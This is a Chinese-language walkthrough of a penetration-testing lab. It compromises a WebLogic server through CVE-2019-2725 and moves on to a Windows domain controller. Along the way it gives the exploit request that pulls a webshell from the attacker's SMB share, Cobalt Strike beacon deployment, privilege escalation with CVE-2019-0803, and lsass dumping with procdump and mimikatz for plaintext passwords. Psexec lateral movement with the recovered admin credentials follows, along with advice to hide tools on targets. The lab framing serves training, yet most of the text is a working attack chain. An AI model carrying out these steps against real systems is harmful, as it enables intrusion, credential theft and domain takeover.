本次渗透流程、知识点:
- namp找weblogic服务
- weblogicscan扫描漏洞,找到漏洞CVE-2019-2725漏洞
- 安装冰蝎软件
- 使用smbserver把冰蝎中shell.jsp木马共享出去
- 查找一个CVE-2019-2725漏洞的POC攻击代码
- 使用burpsuite运行CVE-2019-2725的POC代码,上传shell.jsp木马
- 冰蝎连接被攻击服务器上shell.jsp木马,获得普通用户shell权限
- 安装CobaltStrike软件
- 使用CobaltStrike软件生成木马web.exe
- 使用burpsuite运行CVE-2019-2725的POC代码,上传web.exe木马
- 使用CobaltStrike生成监听器,等待木马web.exe上线
- 在冰蝎终端上运行web.exe木马,开始上线木马
- CobaltStrike上传提权工具CVE-2019-0803.exe获得system权限
- 使用procdump64+mimikatz获得系统用户明文密码
- 域信息收集-找出域控制服务器主机名和IP
- 生成管理帐号密码用户凭证-连接域控服务器-反弹域控shell
链接:https://pan.baidu.com/s/1vssnotoBw2rK_gti8lqTXA提取码:hbck
注:因人数过多领取,非常容易导致失效,如有失效,请添加号主微信,获取资料!
DCIP:10.10.10.10 OS:Windows 2012(64)应用:AD域WEBIP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64)应用:Weblogic 10.3.6 MSSQL 2008PCIP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32)应用:攻击机IP:192.168.111.1OS:Windows 10(64)IP:192.168.111.5OS:Kali
C:OracleMiddlewareuser_projectsdomainsbase_domain24.2.1 信息收集
┌──(root💀xuegod53)-[~]└─# nmap -p- -T5 192.168.111.80 -o web
注:
-p- 表示扫描所有端口;
-T5 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4。
-o 保存扫描结果到文件web
这里常规测试就不检测了,我们启动weblogic服务时WEB主机是安装有数字卫士的,所以就不直接使用漏洞exp进行攻击了,正常情况下都是不可能成功的。
访问链接:
http://192.168.111.80/http://192.168.111.80:7001/
http://192.168.111.80:7001/_async/AsyncResponseService上传WeblogicScan-master.zip 到Kali
└─# unzip WeblogicScan-master.zip└─# cd WeblogicScan-master/└─# python3 WeblogicScan.py 192.168.111.80 7001
可以看到一共存在2个CVE,我们使用CVE-2019-2725即可,该漏洞方便我们拿到shell。2729经测试是失败的,不晓得是否是数字卫士的问题。
CVE-2019-2725漏洞描述:这是一个Weblogic反序列化远程代码执行漏洞。部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
上传冰蝎 Behinder_v3.0_Beta_6_linux.zip 到Kali
┌──(root💀xuegod53)-[~]└─# rz
└─# unzip Behinder_v3.0_Beta_6_linux.zip -d Behinder└─# cd Behinder└─# ls
更新日志.txt Behinder_v3.0_Beta6_linux.jar data.db server
注:暂时先不要启动冰蝎,我们需要先把/root/Behinder/server/shell.jsp webshell木马程序上传weblogic服务器上。然后再使用冰蝎连接shell.jsp木马程序。
2、启动smbserver共享文件服务,将/root/Behinder/server目录共享出去,共享的名称为share
└
─# impacket-smbserver share /root/Behinder/server &POST /_async/AsyncResponseService HTTP/1.1Host: 192.168.111.80:7001User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: closeContent-Type: text/xmlContent-Length: 839xxxxcmd/ccopy \192.168.111.5shareshell.jsp serversAdminServertmp_WL_internalbea_wls9_async_response8tpkyswar1.jsp
在Kali中打开BurpSuite,点Repeater,将适用于CVE-2019-2725漏洞的POC攻击代码复制到Repeater中进行发包。
启动冰蝎,连接上传的1.jsp木马程序
└─# java -jar /root/Behinder/Behinder_v3.0_Beta6_linux.jar &使用冰蝎进行连接:
URL:http://192.168.111.80:7001/_async/1.jsp密码:rebeyond
可以:1 不可以:2
远程桌面需要CS工具。
远程桌面需要CS工具。开眼界:肉鸡上线, 团队做战,多人开战
24.3.1 Cobalt Strike简介
一句话:CS是管理肉鸡的一个好工具。
┌──(root💀xuegod53)-[~]└─# rz
└─# unzip CobaltStrike4.3.zip└─# cd CobaltStrike4.3/添加执行权限└─# chmod +x cobaltstrike teamserver start.sh启动服务端(命令+ip+密码)└─# ./teamserver 192.168.111.5 123456 &
└─# ./start.sh &
修改BurpSuite数据包把web.exe拷贝到服务器,这里你也可以通过冰蝎上传exe文件。
修改数据包内容方式如下,直接修改文件名称重新发包即可。
C:OracleMiddlewareuser_projectsdomainsbase_domain>cd servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/C:OracleMiddlewareuser_projectsdomainsbase_domainserversAdminServertmp_WL_internalbea_wls9_async_response8tpkyswar>web.exe
beacon> sleep 2
beacon> shell dir
C:OracleMiddlewareuser_projectsdomainsbase_domainserversAdminServertmp_WL_internalbea_wls9_async_response8tpkyswar>后期使用cs上传相关利用工具到此目录,在实际渗透中,最好将一些利用工具上传到比较隐蔽的位置。
查看当前用户身份,发现是WEBde1ay普通用户
beacon> getuid
上传相关利用工具到Kali
upload /root/CVE-2019-0803.exeupload /root/mimidrv.sysupload /root/mimikatz.exeupload /root/mimilib.dllupload /root/procdump64.exe
或使用窗口方式上传:
beacon> shell dir
前面知道系统没安装什么补丁。所以我们直接利用工具提权即可。
[01]: KB2999226[02]: KB958488[03]: KB976902
返回SYSTEM权限的shell
beacon> shell CVE-2019-0803.exe cmd "start web.exe"
lsass.exe 进程概述:lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。也就是说lsass.exe进程运行后,里面会保存用户帐号和密码信息。
基于刚获取的SYSTEM权限,来获取到lsass.exe 进程的内存文件。lsass.exe内存文件中会存储明文登录密码。
beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp
-accepteula参数:指定是否自动接受 Microsoft 软件许可条款。所有无人参与安装都需要此设置。
-ma 参数:生成full dump, 即包括进程的所有内存. 默认的dump格式包括线程和句柄信息.
利用mimikatz.exe从 lsass.dmp 里获取windows处于active状态账号的明文密码
beacon> shell mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >pass.txt
beacon> download pass.txt
┌──(root💀xuegod53)-[~/CobaltStrike4.3]└─# cd downloads/文件名是随机字符串└─# lsffc9a80c8└─# cat ffc9a80c8
目前得到账户信息:
域用户名:de1aymssql 密码:1qaz@WSX
域用户名:de1ayadministrator 密码:1qaz@WSX #这是DC域管理员用户和密码
本地用户名:WEBde1ay 密码:1qaz@WSX 该用户是系统本地登录系统用的。
beacon> shell ipconfig /all
查看域控制器
shell net group "domain controllers" /domain主机名:DC,完整主机是:DC.de1ay.com再确认主机名为DC的IP地址:beacon> shell ping dc或:beacon> shell ping DC
注:windows对字母大小,不敏感
beacon> shell net group "domain admins" /domain
beacon> rev2self
查看当前的权限:
beacon> getuid
beacon> make_token DE1AYadministrator 1qaz@WSX
beacon> jump psexec DC smb
或:jump psexec 10.10.10.10 smb #目标机器可以是DC主机名,也可以是IP
启动PC虚拟
选择任意一个台机器,右击,选择目录,端口扫描:
2、生成域用户凭证和监听器
选择拥有system权限的会话,这个会话之前已经完成以下两步骤:
(1)、域控制器用户DE1AYadministrator的凭证
beacon> make_token DE1AYadministrator 1qaz@WSX
(2)、还有smb监听器
DC上线,jump会使用前面的凭证和smb监听器,完成登录DC的过程
beacon> jump psexec DC smb
所以在域中横向移动时,可以直接使用,不要重新生域用户凭证和监听器
3、选择横向移动到另一个台机器
beacon> jump psexec 10.10.10.201 smb
梳理本次渗透流程,如下:
- namp找weblogic服务
- weblogicscan扫描漏洞,找到漏洞CVE-2019-2725漏洞
- 安装冰蝎软件
- 使用smbserver把冰蝎中shell.jsp木马共享出去
- 查找一个CVE-2019-2725漏洞的POC攻击代码
- 使用burpsuite运行CVE-2019-2725的POC代码,上传shell.jsp木马
- 冰蝎连接被攻击服务器上shell.jsp木马,获得普通用户shell权限
- 安装CobaltStrike软件
- 使用CobaltStrike软件生成木马web.exe
- 使用burpsuite运行CVE-2019-2725的POC代码,上传web.exe木马
- 使用CobaltStrike生成监听器,等待木马web.exe上线
- 在冰蝎终端上运行web.exe木马,开始上线木马
- CobaltStrike上传提权工具CVE-2019-0803.exe获得system权限
- 使用procdump64+mimikatz获得系统用户明文密码
- 域信息收集-找出域控制服务器主机名和IP
- 生成管理帐号密码用户凭证-连接域控服务器-反弹域控shell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论